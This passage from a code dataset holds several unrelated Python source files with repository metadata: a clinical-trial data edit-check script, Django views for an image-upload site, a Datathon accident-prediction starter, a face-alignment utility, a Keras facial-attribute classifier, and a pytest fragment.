HOLES:\n square_dist = (hole[0] - x) ** 2 + (hole[1] - y) ** 2\n if square_dist < radius ** 2:\n inside += 1\n\n if inside > 0:\n cv2.putText(frame, 'IN', (750, 400), cv2.FONT_HERSHEY_SIMPLEX, 3, GREEN, 9)\n return GREEN\n else:\n cv2.putText(frame, 'OUT', (750, 400), cv2.FONT_HERSHEY_SIMPLEX, 3, RED, 9)\n return RED\n\n\ndef line_intersection(line1, line2):\n \"\"\"\n https://stackoverflow.com/a/20677983\n \"\"\"\n xdiff = (line1[0][0] - line1[1][0], line2[0][0] - line2[1][0])\n ydiff = (line1[0][1] - line1[1][1], line2[0][1] - line2[1][1])\n\n def det(a, b):\n return a[0] * b[1] - a[1] * b[0]\n\n div = det(xdiff, ydiff)\n if div == 0:\n raise Exception('lines do not intersect')\n\n d = (det(*line1), det(*line2))\n x = det(d, xdiff) / div\n y = det(d, ydiff) / div\n return int(x), int(y)\n\n\ndef find_angle(img, point1, point2, point3, show_degrees=False):\n x1, y1 = point1[0], point1[1]\n x2, y2 = point2[0], point2[1]\n x3, y3 = point3[0], point3[1]\n\n angle = math.degrees(math.atan2(y3 - y2, x3 - x2) - math.atan2(y1 - y2, x1 - x2))\n\n if show_degrees:\n cv2.putText(img, str(int(angle + 360)), (x2 - 50, y2 + 50),\n cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 2)\n\n return angle + 360 if angle < 0 else angle\n","repo_name":"raulperezalejo/pool_game_predicton","sub_path":"pool_utils.py","file_name":"pool_utils.py","file_ext":"py","file_size_in_byte":4490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"21317043876","text":"import pandas as pd\nimport math\nfrom datetime import datetime\nfrom revision_fechas import revision_fecha\nfrom log_writer import log_writer\nimport warnings\npd.set_option('display.max_columns', None)\nfrom openpyxl import load_workbook\nfrom openpyxl.utils.dataframe import 
dataframe_to_rows\n\n\n\ndef adminsitration_CpG_ODN(df_root, path_excel_writer):\n '''\n Esta funcion tiene como finalidad la revision de cada uno de los puntos \n del edit check para el formulario de CpG ODN D35 Administration\n '''\n\n df = df_root[df_root['name']=='CpG ODN D35 Administration'] \n lista_sujetos = df['Participante'].unique()\n\n df = df[['name', 'Visit', 'activityState', 'Participante', 'Estado del Participante', 'Campo', 'Valor', 'FormFieldInstance Id', 'displayName']]\n df['Value_id'] = df['Valor'].astype(str) + '|' + df['FormFieldInstance Id'].astype(str) + '|' + df['displayName'].astype(str)\n\n df_date_visit = df_root[df_root['name']== 'Date of visit']\n df_date_visit = df_date_visit[['Visit','Participante', 'Campo', 'Valor']]\n df_date_visit = df_date_visit[df_date_visit['Campo']== 'Visit Date']\n df_date_visit['to_join'] = df_date_visit['Valor']\n df_date_visit = df_date_visit[['Participante', 'to_join','Visit', 'Valor']]\n df_date_visit = df_date_visit.rename(columns={'Participante':'Subject' ,'Visit':'visita_para_comparar', 'Valor':'Date_of_visit_value'})\n\n df_informed = df_root[df_root['name']=='Informed Consent']\n df_informed = df_informed[['Visit','Participante', 'Campo', 'Valor']]\n df_informed = df_informed[df_informed['Campo']=='Informed consent signature date']\n df_informed = df_informed[['Participante','Valor']]\n df_informed = df_informed.rename(columns={'Participante':'Subject', 'Valor':'Inform_consent_date'})\n\n df_date_visit_randomization = df_root[df_root['name']== 'Date of visit']\n df_date_visit_randomization = df_date_visit_randomization[['Visit','Participante', 'Campo', 'Valor']]\n df_date_visit_randomization = df_date_visit_randomization[df_date_visit_randomization['Campo']== 'Visit Date']\n df_date_visit_randomization = df_date_visit_randomization[df_date_visit_randomization['Visit']== 'D-1']\n df_date_visit_randomization = df_date_visit_randomization[['Participante','Valor']]\n df_date_visit_randomization = df_date_visit_randomization.rename(columns={'Participante':'Subject', 'Valor':'Visita_randomization'})\n\n df_adverse = df_root[df_root['name']=='Adverse Events']\n df_adverse = df_adverse[['Visit','Participante', 'Campo', 'Valor']]\n df_adverse = df_adverse[df_adverse['Campo']== 'Action taken with study treatment (CPG ODN D35)']\n df_adverse = df_adverse[['Participante','Valor']]\n df_adverse = df_adverse.rename(columns={'Participante':'Subject', 'Valor':'action_taken_study_treatment'})\n\n lista_revision = []\n lista_logs = ['CpG ODN D35 Administration']\n\n for sujeto in lista_sujetos:\n sujeto_principal = df[df['Participante']== sujeto]\n sujeto_principal = sujeto_principal.sort_values(by=['FormFieldInstance Id'], ascending=True)\n sujeto_principal = sujeto_principal.reset_index(drop=True)\n\n # Los formularios que estan clasificados como unscheduled, no se pueden iterar con la visita, por lo que usamos el siguiente codigo para realizar la particion\n #p\n date_indices = sujeto_principal.index[sujeto_principal['Campo'] == 'Date of dosing'].tolist()\n subdatasets = [sujeto_principal.iloc[start:end] for start, end in zip(date_indices, date_indices[1:] + [None])]\n\n date_dosing_list_review = []\n\n for subdataset in subdatasets:\n\n pru = subdataset\n pru = pru[['Campo', 'Value_id']].T\n new_columns = pru.iloc[0]\n pru = pru[1:].set_axis(new_columns, axis=1)\n pru['Subject'] = sujeto\n pru['Visit'] = 'unscheduled'\n pru['status'] = 'doesnt matter'\n pru['to_join'] = pru['Date of dosing'].str.split('|').str[0]\n pru = 
pru.merge(df_date_visit, on=['Subject', 'to_join'], how='left')\n pru = pru.merge(df_informed, on=['Subject'], how='left')\n pru = pru.merge(df_date_visit_randomization, on=['Subject'], how='left')\n pru = pru.merge(df_adverse, on=['Subject'], how='left')\n\n\n for index, row in pru.iterrows():\n status = row['status']\n subject = row['Subject']\n visit = row['Visit']\n\n visita_comparar = row['visita_para_comparar']\n inform_consent_date = row['Inform_consent_date']\n visita_randomization = row['Visita_randomization']\n action_taken_CpG = row['action_taken_study_treatment']\n\n\n if status != '':\n try:\n date_dosing = row['Date of dosing']\n date_dosing_pure = date_dosing.split('|')[0]\n date_dosing_form_field_instance = date_dosing.split('|')[1]\n date_dosing_disname = date_dosing.split('|')[0]\n except:\n date_dosing_pure = ''\n date_dosing_form_field_instance = 'This field doesnt have any data'\n date_dosing_disname = 'Empty'\n\n try:\n reason_dose_adjustment = row['Reason for dose adjustment']\n reason_dose_adjustment_pure = reason_dose_adjustment.split('|')[0]\n reason_dose_adjustment_form_field_instance = reason_dose_adjustment.split('|')[1]\n reason_dose_adjustment_disname = reason_dose_adjustment.split('|')[2]\n except:\n reason_dose_adjustment_pure = math.nan\n reason_dose_adjustment_form_field_instance = 'This field doesnt have any data'\n reason_dose_adjustment_disname = 'Empty'\n \n try:\n dosing_event = row['Dosing Event']\n dosing_event_pure = dosing_event.split('|')[0]\n dosing_event_form_field_instance = dosing_event.split('|')[1]\n dosing_event_disname = dosing_event.split('|')[2]\n except:\n dosing_event_pure = math.nan\n dosing_event_form_field_instance = 'This field doesnt have any data'\n dosing_event_disname = 'Empty'\n # ---------------------------------------------------------------------------------------\n if date_dosing_pure == '':\n pass\n else:\n try:\n # Primera revision general de formato de fecha ->GE0020\n f = revision_fecha(date_dosing_pure)\n if f == None:\n pass\n else:\n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance,\\\n f , date_dosing_disname, 'GE0020']\n lista_revision.append(error) \n\n except Exception as e:\n lista_logs.append(f'Revision GE0020 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0020\n try:\n lista_permitidos_visita_dosing = ['D1', 'D15', 'D29']\n if visita_comparar not in lista_permitidos_visita_dosing:\n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance, \\\n 'The date must be equal to the D1, D15 or D29 date of visit', visita_comparar, 'IMP0020']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0020 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0040\n try:\n if datetime.strptime(str(date_dosing_pure), '%d-%b-%Y') >= datetime.strptime(str(inform_consent_date), '%d-%b-%Y'):\n pass\n else: \n error = [subject, visit, 'Date of dosing', date_dosing_form_field_instance, \\\n 'The date/time of dosing can not be before the informed consent date/time', date_dosing_disname, 'IMP0040']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0040 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0050\n try:\n if datetime.strptime(str(date_dosing_pure), '%d-%b-%Y') >= datetime.strptime(str(visita_randomization), '%d-%b-%Y'):\n pass\n else: \n error = [subject, visit, 'Date of dosing', \\\n date_dosing_form_field_instance, \\\n 'The date/time of dosing can not be 
before the randomization date/time', \\\n f'{date_dosing_disname} - {visita_randomization}', 'IMP0050']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0050 --> {e} - Subject: {subject}, Visit: {visit} ')\n \n if date_dosing == '':\n pass\n else:\n # Revision IMP0060\n try:\n if date_dosing_pure in date_dosing_list_review:\n error = [subject, visit, 'Date of dosing', \\\n date_dosing_form_field_instance, \\\n 'The dosing date can not be repeated', date_dosing_disname, 'IMP0060']\n lista_revision.append(error)\n else: \n date_dosing_list_review.append(date_dosing_pure)\n except Exception as e:\n lista_logs.append(f'Revision IMP0060 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n # Revision IMP0080\n try: \n if float(dosing_event_pure) == 2.0: \n if float(reason_dose_adjustment_pure) == 1.0:\n if float(action_taken_CpG) == 3.0:\n pass\n else:\n error = [subject, visit, 'Reason for dose adjustment', dosing_event_form_field_instance, \\\n 'If dosing event is Temporarily discontinued and the reason for adjustment is \"Adverse event\" there should be an adverse event created where the action taken (CPG ODN 035) should be CT drug stopped (temporarily)', \\\n dosing_event_disname, 'IMP0080']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0080 --> {e} - Subject: {subject}, Visit: {visit} ')\n \n # Revision IMP0090\n try:\n if float(dosing_event_pure) == 3.0:\n if float(reason_dose_adjustment_form_field_instance) == 1.0:\n if float(action_taken_CpG) == 4.0:\n pass\n else:\n error = [subject, visit, 'Reason for dose adjustment', dosing_event_form_field_instance, \\\n 'If dosing event is Permanently discontinued and the reason for adjustment is \"Adverse event\" there should be an adverse event created where the action taken (CPG ODN 035) should be CT drug stopped (permanently)', \\\n dosing_event_disname, 'IMP0090']\n lista_revision.append(error)\n except Exception as e:\n lista_logs.append(f'Revision IMP0090 --> {e} - Subject: {subject}, Visit: {visit} ')\n\n \n excel_writer = load_workbook(path_excel_writer)\n column_names = ['Subject', 'Visit', 'Field', 'Form Field Instance ID' ,'Standard Error Message', 'Value', 'Check Number']\n adminsitration_CpG_ODN_output = pd.DataFrame(lista_revision, columns=column_names)\n\n\n \n sheet = excel_writer.create_sheet('CpG ODN D35 Administration')\n\n for row in dataframe_to_rows(adminsitration_CpG_ODN_output, index=False, header=True):\n sheet.append(row)\n\n excel_writer.save(path_excel_writer)\n\n log_writer(lista_logs)\n\n return adminsitration_CpG_ODN_output[['Form Field Instance ID' ,'Standard Error Message']].replace({',': '', ';': ''}, regex=True)\n\n\nif __name__ == '__main__':\n path_excel = r\"C:\\Users\\sebastian sossa\\Documents\\integraIT\\projects_integrait\\DNDI\\Program\\output\\prueba.xlsx\"\n df_root = pd.read_excel(r\"C:\\Users\\sebastian sossa\\Documents\\integraIT\\projects_integrait\\DNDI\\data\\newDNDI_v2.xlsx\")\n adminsitration_CpG_ODN(df_root, path_excel ) \n\n\n\n\n\n\n\n ","repo_name":"sebastiansossah/DNDI_cleaning_code","sub_path":"Program/code/Administration_CpG_ODN.py","file_name":"Administration_CpG_ODN.py","file_ext":"py","file_size_in_byte":13720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17499764471","text":"from django.shortcuts import render\nfrom django.http import HttpResponse, HttpResponseRedirect\nfrom django.contrib.auth import authenticate, login, logout\nfrom 
openstreetview.forms import *\nfrom django.contrib.auth.models import User\nfrom django.contrib.auth.decorators import login_required\nfrom django.core import serializers\nfrom openstreetview.models import *\nimport datetime\nimport json\n\ndef home(request):\n return render(request, 'index.html')\n\n\ndef signup(request):\n if request.method == 'POST':\n form = register_form(request.POST)\n if form.is_valid():\n username_ = form.cleaned_data['username']\n password_ = form.cleaned_data['password']\n email_ = form.cleaned_data['email']\n if User.objects.filter(username=username_).exists():\n form = register_form()\n error = \"User Already Exists\"\n else:\n u = User.objects.create_user(username_,email_, password_)\n u.is_active = True\n u.save()\n return HttpResponseRedirect('/')\n else:\n form = register_form()\n error = \"Invalid Inputs\" \n else:\n form = register_form()\n error = \"\"\n\n return render(request, 'useform.html', {'form': form, 'error': error})\n\n@login_required\ndef add_image(request):\n if request.method == 'POST':\n form = loc_form(request.POST)\n if form.is_valid():\n image_name_ = form.cleaned_data['docfile']\n x_loc_ = form.cleaned_data['loc_x']\n y_loc_ = form.cleaned_data['loc_y']\n img_add = image_data(image_path=image_name_, location_x=x_loc_, location_y=y_loc_,approvals=0)\n img_add.save()\n imgurl = 'http://127.0.0.1:3000/' + image_name_\n return render(request, \"complete.html\", { 'imgurl' : imgurl })\n else:\n return HttpResponse(\"naa!! -_-\")\n else:\n return HttpResponse(\"ACCESS DISABLED\")\n\n@login_required\ndef imagelocation(request, image_name):\n form = loc_form(initial={'docfile': image_name})\n return render(request, \"addimgform.html\", { 'form': form})\n \n\n@login_required\ndef upload_image(request):\n if request.method == 'POST':\n form = DocumentForm(request.POST, request.FILES)\n if form.is_valid():\n ext = request.FILES['docfile'].name.split('.')[1]\n request.FILES['docfile'].name = datetime.datetime.now().strftime(\"%Y%m%d%H%M%S\") + '.' 
+ ext\n newdoc = Document(docfile = request.FILES['docfile'])\n newdoc.save()\n newform = loc_form(initial={'docfile': request.FILES['docfile'].name })\n return render(request, \"addimgform.html\", { 'form': newform})\n else:\n form = DocumentForm()\n\n return render(request, 'uploadform.html', {'form':form})\n\n\ndef mapdata(request):\n imgdata = image_data.objects.all()\n data = serializers.serialize('json', imgdata, indent=2)\n return HttpResponse(data, content_type='application/json')\n\n@login_required\ndef load_unapproved_images(request):\n unapprovedimages = image_data.objects.filter(approvals__lt = 2)\n return render(request, 'imageapproval.html', { 'images': unapprovedimages })\n\ndef approve_image(request):\n imglist = request.POST.getlist('approvedimages[]') \n data = json.loads(request.body)\n for img in imglist:\n image = image_data.objects.get(id=img)\n image.approvals += 1\n image.save()\n return HttpResponseRedirect(\"/\")\n\n\n","repo_name":"gaganjyot/OSV","sub_path":"OpenStreetView/openstreetview/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3516,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"11147262075","text":"\"\"\"Account models.\"\"\"\n\nfrom django.db import models\nfrom django.utils.translation import gettext_lazy as _\nfrom django.conf import settings\nfrom account import validators\n\n\nclass Profile(models.Model):\n class Meta:\n verbose_name = _(\"profile\")\n verbose_name_plural = _(\"profiles\")\n\n user = models.OneToOneField(\n settings.AUTH_USER_MODEL,\n on_delete=models.CASCADE,\n verbose_name=_(\"user\"),\n )\n phone_number = models.CharField(\n validators=[\n validators.PhoneRegexValidator(\n message=_(\"Phone number must be 10 digits.\"))\n ],\n max_length=10,\n blank=True,\n verbose_name=_(\"phone number\"),\n )\n avatar = models.ForeignKey(\n \"common.Image\",\n on_delete=models.SET_NULL,\n null=True,\n blank=True,\n verbose_name=_(\"avatar\"),\n )\n","repo_name":"IgelVV/bg_shop_django","sub_path":"bg_shop/account/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17713291220","text":"#!/usr/bin/python\r\n\"\"\"\r\nCopyright 2016 Accenture and/or its affiliates. All Rights Reserved. \r\nYou may not use, copy, modify, and/or distribute this code and/or its documentation without permission from Accenture.\r\nPlease contact the Advanced Analytics-Operations Analytics team and/or Frode Huse Gjendem (lead) with any questions.\r\n\r\n\\brief This is the starter script for the Accenture's Datathon 2016 competition.\r\n\r\n\\version 1.0\r\n\r\n\\date $Date: 2016/05/17\r\n\r\n\"\"\"\r\nimport os\r\nimport gc\r\nimport pandas as pd\r\nimport numpy as np\r\nimport re\r\nimport csv\r\nfrom datetime import datetime, timedelta\r\nfrom collections import OrderedDict\r\nfrom itertools import product\r\n\r\n# Enter your input data and output data paths below.\r\nPATH = \".\\datathon\\data\"\r\nOUTPATH = \".\\datathon\\results\"\r\n# Set the input data folder as default path.\r\nos.chdir(PATH)\r\n\r\ndef as_Date(stringDate):\r\n \"\"\" It formats the given string date. 
\r\n @param stringDate is the input string containing a date.\r\n @return a datetime object.\r\n \"\"\" \r\n month = re.sub('(^[0-9]{4})-([0-9]{1,2}|[a-zA-Z]{3,9})-([0-9]{1,2}|[a-zA-Z]{3,9})$', '\\\\2', stringDate)\r\n result = np.nan\r\n if str.isalpha(month):\r\n result = datetime.strptime(stringDate, \"%Y-%B-%d\")\r\n return result\r\n \r\ndef naive_model(training):\r\n \"\"\" It computes the naive mean model.\r\n @param training is the pandas data frame with the data.\r\n @return a dictionary-based model, where the key is the \r\n composition of .\r\n \"\"\"\r\n aggregated_data = training.Accident.groupby([training.month, training.Shift, training.GridID])\r\n count_agg = aggregated_data.count()\r\n sum_agg = aggregated_data.sum()\r\n mean_agg = sum_agg/count_agg\r\n dict_agg = mean_agg.to_dict()\r\n return dict_agg\r\n\r\n# Read the input files. Notice that it is necessary to use encoding = 'cp1252' to fix issues with file encoding. \r\naccidents = pd.read_csv(\"accidents.csv\", encoding = 'cp1252') \r\ngrid = pd.read_csv(\"city-grid.csv\")\r\ntest = pd.read_csv(\"test.csv\")\r\n\r\n# Format the dates.\r\naccidents.dropna(inplace = True)\r\naccidents.GridID = accidents.GridID.astype(int)\r\nfor i in range(0, len(accidents.date)):\r\n accidents.date.values[i] = as_Date(accidents.date.values[i])\r\n\r\n# Group at prediction level.\r\ndata = accidents[['GridID', 'date', 'Shift']].copy()\r\ndata.dropna(inplace = True)\r\ndata['Accident'] = pd.Series(1, index = data.index)\r\n\r\n# Generate the no accidents data.\r\nstart = datetime.strptime(\"2010-01-01\", \"%Y-%m-%d\")\r\nend = datetime.strptime(\"2015-01-01\", \"%Y-%m-%d\")\r\ndates = [start + timedelta(days = x) for x in range(0, (end - start).days)]\r\nShift = data.Shift.unique()\r\nGridID = data.GridID.unique()\r\ntmp = {'date': dates, 'Shift': Shift, 'GridID': GridID}\r\n# This is the typical cartessian product... 
pandas version...\r\nod_tmp = OrderedDict(sorted(tmp.items()))\r\ncartProd_tmp = list(product(*od_tmp.values()))\r\nnoAccidents = pd.DataFrame(cartProd_tmp, columns = od_tmp.keys())\r\nnoAccidents['Accident'] = pd.Series(0, index = noAccidents.index)\r\n# Join the data together.\r\nframes = [data, noAccidents] \r\ntraining = pd.concat(frames)\r\ntraining = pd.merge(training, grid, on = 'GridID', how = 'left')\r\ndel dates, frames, start, end, od_tmp, cartProd_tmp, accidents, noAccidents, data, tmp, Shift, grid, GridID\r\ngc.collect()\r\n\r\n# Run the naive model.\r\ntraining['month'] = pd.DatetimeIndex(training.date).month\r\nmodel = naive_model(training)\r\n\r\n# Perform the prediction.\r\nfor i in range(0, len(test.date)):\r\n test.date.values[i] = datetime.strptime(test.date.values[i], \"%Y-%m-%d\")\r\ntest['month'] = pd.DatetimeIndex(test.date).month\r\ntest['AccidentLikelihood'] = pd.Series(0.0, index = test.index)\r\nfor i in range(0, len(test)):\r\n value = 0.0\r\n try:\r\n value = model[test.month.values[i], test.Shift.values[i], test.GridID.values[i]]\r\n except KeyError:\r\n pass\r\n test.AccidentLikelihood.values[i] = value\r\n\r\n# Save the submission\r\nsubmission = test[['date', 'Shift', 'GridID', 'AccidentLikelihood']].copy()\r\n# Reshape the time to fit the submission format...\r\nfor i in range(0, len(submission)):\r\n submission.date.values[i] = datetime.strftime(submission.date.values[i], \"%Y-%m-%d\")\r\n# Write the final CSV file.\r\nsubmission.to_csv(OUTPATH + \"/submission.csv\", quoting = csv.QUOTE_NONNUMERIC, index = False)\r\n\r\n# Free memory.\r\ndel model, test, training, submission, i, value\r\ngc.collect()\r\n","repo_name":"apolitogaga/Data-test","sub_path":"code/starterScript.py","file_name":"starterScript.py","file_ext":"py","file_size_in_byte":4427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"19573641353","text":"# -*- coding: utf-8 -*- \n\n\"\"\"\nCreated on 2021/12/10\n\n@author: Ruoyu Chen\n\"\"\"\n\nimport os\nimport cv2\nimport numpy as np\nfrom skimage import transform as trans\n\nclass FaceAlignment():\n \"\"\"\n demo of face alignment\n \"\"\"\n def __init__(self):\n super(FaceAlignment, self).__init__()\n # init templete src\n self.init_src()\n \n def init_src(self):\n \"\"\"\n src us template, for the five common face position templates.\n \"\"\"\n src1 = np.array([[51.642, 50.115], [57.617, 49.990], [35.740, 69.007],\n [51.157, 89.050], [57.025, 89.702]],\n dtype=np.float32)\n #<--left\n src2 = np.array([[45.031, 50.118], [65.568, 50.872], [39.677, 68.111],\n [45.177, 86.190], [64.246, 86.758]],\n dtype=np.float32)\n\n #---frontal\n src3 = np.array([[39.730, 51.138], [72.270, 51.138], [56.000, 68.493],\n [42.463, 87.010], [69.537, 87.010]],\n dtype=np.float32)\n\n #-->right\n src4 = np.array([[46.845, 50.872], [67.382, 50.118], [72.737, 68.111],\n [48.167, 86.758], [67.236, 86.190]],\n dtype=np.float32)\n\n #-->right profile\n src5 = np.array([[54.796, 49.990], [60.771, 50.115], [76.673, 69.007],\n [55.388, 89.702], [61.257, 89.050]],\n dtype=np.float32)\n\n src = np.array([src1, src2, src3, src4, src5])\n\n arcface_src = np.array(\n [[38.2946, 51.6963], [73.5318, 51.5014], [56.0252, 71.7366],\n [41.5493, 92.3655], [70.7299, 92.2041]],\n dtype=np.float32)\n\n self.src_map = {112: src, 224: src * 2}\n self.arcface_src = np.expand_dims(arcface_src, axis=0)\n\n def estimate_norm(self, lmk, image_size=112, mode='arcface'):\n \"\"\"\n Estimate the warp matrix\n \"\"\"\n assert lmk.shape 
== (5, 2)\n tform = trans.SimilarityTransform()\n lmk_tran = np.insert(lmk, 2, values=np.ones(5), axis=1)\n min_M = []\n min_index = []\n min_error = float('inf')\n if mode == 'arcface':\n assert image_size == 112\n src = self.arcface_src\n else:\n src = self.src_map[image_size]\n for i in np.arange(src.shape[0]):\n tform.estimate(lmk, src[i])\n M = tform.params[0:2, :]\n results = np.dot(M, lmk_tran.T)\n results = results.T\n error = np.sum(np.sqrt(np.sum((results - src[i])**2, axis=1)))\n # print(error)\n if error < min_error:\n min_error = error\n min_M = M\n min_index = i\n return min_M, min_index\n \n def norm_crop(self, img, landmark, image_size=112, mode='arcface'):\n \"\"\"\n Warp the face, align\n \"\"\"\n M, pose_index = self.estimate_norm(landmark, image_size, mode)\n # warped = cv2.warpAffine(img, M, (image_size, image_size), borderValue=0.0)\n warped = cv2.warpAffine(img, M, (image_size, image_size), None, flags=cv2.INTER_LINEAR, borderMode=cv2.BORDER_REFLECT_101 )\n return warped\n\n def __call__(self, img, landmark, image_size=112, mode='arcface'):\n \"\"\"\n img: The input image, BGR format\n landmark: (5, 2)\n image_size: crop box size\n mode: usually is arcface, other mode can has image_size 224\n \"\"\"\n wrap = self.norm_crop(img, landmark, image_size=image_size, mode=mode)\n return wrap\n","repo_name":"RuoyuChen10/FaceTechnologyTool","sub_path":"FaceRecognition/tools/alignment.py","file_name":"alignment.py","file_ext":"py","file_size_in_byte":3572,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"66"} +{"seq_id":"86672985569","text":"import tensorflow as tf\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport wandb\nfrom wandb.keras import WandbCallback\nimport keras\nfrom keras import layers, models\nfrom keras.models import Sequential\nfrom keras.layers import Dense,Conv2D, Dropout,Activation,MaxPooling2D,Flatten\nfrom tensorflow.keras.optimizers import RMSprop, SGD\n\n#############\n#Carga de datos#\n#atributos = 'Base de datos/list_attr_celeba.txt'\n#atributos_modificado = 'C:/Users/wwwle/Documents/Materias_Universidad/Redes Neuronales/Proyecto-2_RNA/Base de datos/list_attr_celeba_modificado.txt'\n#with open(atributos, 'r') as f:\n #print(\"skipping: \" + f.readline())\n #print(\"skipping headers: \" + f.readline())\n #with open(atributos_modificado, 'w') as newf:\n #for line in f:\n #new_line = ' '.join(line.split())\n #newf.write(new_line)\n #newf.write('\\n')\n \n#Se definen los parámetros a utilizar\nepochs = 10\nbatch_size = 40\noptimizer = 'rmsprop'\nih, iw = 192, 192 #tamaño de la imagen\ninput_shape = (ih, iw,3)\n\n#Se define el dataframe\natributos = 'C:/Users/warri/Downloads/Proyecto-2_RNA-main/Base de datos/list_attr_celeba_modificado.txt'\ndf = pd.read_csv(atributos, sep=' ', header=None, engine='python')\n#skipfooter=135066,\n#Se separan las imagenes y sus atributos para poder modificar los valores de -1 a 0, luego se vuelven a unir\nfiles = tf.data.Dataset.from_tensor_slices(df[0])\nattributes= tf.data.Dataset.from_tensor_slices(df.iloc[:,1:].to_numpy().astype('int64')).map(lambda x: ((x+1)/2))\ndata = tf.data.Dataset.zip((files,attributes))\nruta_imagenes = 'C:/Users/warri/Downloads/Proyecto-2_RNA-main/Base de datos/img_align_celeba/'\ndef process_file(file_name, attributes):\n image = tf.io.read_file(ruta_imagenes + file_name)\n image = tf.image.decode_jpeg(image, channels=3)\n image = tf.image.resize(image, [ih,iw])\n image /= 255.0\n return image, 
attributes\nimagen_etiquetada = data.map(process_file).batch(batch_size)\n\n#Se definen parámetros de la red y se dividen los datos en datos de entrenamiento y prueba\nnum_train = int(len(df)*0.7)\nnum_test =len(df) - num_train\nepochs_steps = num_train // batch_size\ntest_steps = num_test // batch_size\ndata_train = imagen_etiquetada.take(num_train)\ndata_test = imagen_etiquetada.skip(num_train)\n########################################\nwandb.init(project=\"reconocimiento facial\")\nwandb.config.epochs = epochs\nwandb.config.batch_size = batch_size\nwandb.config.optimizer = optimizer\n#######################################\n#Se comienza a definir a estructura de la red neuronal\nmodel = Sequential()\n#Primera capa (Convolucional)\nmodel.add(Conv2D(40, (3, 3), input_shape=input_shape))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Segunda capa (Convolucional)\nmodel.add(Conv2D(80, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Tercera capa (Convolucional)\nmodel.add(Conv2D(120, (3, 3)))\nmodel.add(Activation('relu'))\nmodel.add(MaxPooling2D(pool_size=(2,2)))\n#Cuarta capa (Plana)\nmodel.add(Flatten())\nmodel.add(Dense(64))\nmodel.add(Activation('relu'))\nmodel.add(Dropout(0.2))\n #\nmodel.add(Dense(40))\nmodel.add(Activation('sigmoid'))\n##########################################\nmodel.compile(loss='binary_crossentropy',\n optimizer=optimizer,\n metrics=['binary_accuracy'])\n#\nmodel.summary()\n#\nhistory= model.fit(data_train,\n epochs=epochs,\n batch_size=batch_size,\n validation_data=data_test,\n validation_steps=test_steps,\n callbacks=[WandbCallback()])\n\nmodel.save('rfnn.h5')\n","repo_name":"UrielCasco01/Proyecto-2_RNA","sub_path":"Red Neuoronal/Detección de atributos.py","file_name":"Detección de atributos.py","file_ext":"py","file_size_in_byte":3595,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"33568552032","text":"import json\nimport os\n\nimport pytest\n\nfrom taxi.internal.yt_import.schema import loaders\nimport helpers\n\n\nTESTCASES_DIRNAME = 'testcases'\n\nNOW = '2018-08-21 00:00:00.0'\n\n\ndef flatten_dict_all_levels(dct, start_level=0, prefix='', delimiter='.'):\n \"\"\"\n :param dct: dict to flatten\n :param start_level: the least included output level,\n zero includes dict itself\n :param prefix: paths prefix\n :param delimiter: delimeter to use in path\n :return: flattened dict\n\n >>> dct = {\n ... 'foo': {\n ... 'bar': {\n ... 'baz': 1,\n ... 'qux': 1\n ... }\n ... }\n ... }\n >>> flatten_dict_all_levels(dct)\n ... {\n ... # level 0\n ... 'foo': {'bar': {'baz': 1, 'qux': 1}},\n ... # level 1\n ... 'foo.bar': {'baz': 1, 'qux': 1},\n ... # level 2\n ... 'foo.bar.baz': 1,\n ... 'foo.bar.qux': 1\n ... 
}\n \"\"\"\n return dict(\n (key, value)\n for level, key, value in\n _flatten_items_all_levels(dct, prefix=prefix, delimiter=delimiter)\n if level >= start_level\n )\n\n\ndef _flatten_items_all_levels(dct, prefix='', delimiter='.', level=0):\n for key, value in dct.iteritems():\n if isinstance(value, dict):\n for sublevel, subkey, subvalue in _flatten_items_all_levels(\n value,\n prefix='{}{}{}'.format(prefix, key, delimiter),\n delimiter=delimiter,\n level=level + 1\n ):\n yield sublevel, subkey, subvalue\n yield level, '{}{}'.format(prefix, key), value\n else:\n yield level, '{}{}'.format(prefix, key), value\n\n\ndef _parametrize_mapper_testcase():\n import_rules = loaders.load_all_rules()\n\n parameters, ids = [], []\n for import_rule in import_rules:\n parameters.append(import_rule)\n ids.append(import_rule.name)\n\n return pytest.mark.parametrize('import_rule', parameters, ids=ids)\n\n\n@pytest.mark.now(NOW)\n@pytest.mark.asyncenv('blocking')\n@pytest.mark.filldb(_fill=False)\n@_parametrize_mapper_testcase()\ndef test_mapper(import_rule, load):\n testcase_path = os.path.join(\n TESTCASES_DIRNAME, '%s.json' % import_rule.name\n )\n testcases = json.loads(\n load(testcase_path), object_hook=helpers.bson_object_hook\n )\n\n for index, testcase in enumerate(testcases):\n if testcase.get('$byteify_input'):\n testcase['input'] = _byteify(testcase['input'])\n\n mapper = import_rule.mapper_builder(\n attributes=testcase.get('attributes')\n )\n result = mapper(testcase['input'])\n if result != testcase['expected']:\n testcase_description = (\n 'Mapper output does not match expected values %s, '\n 'document index 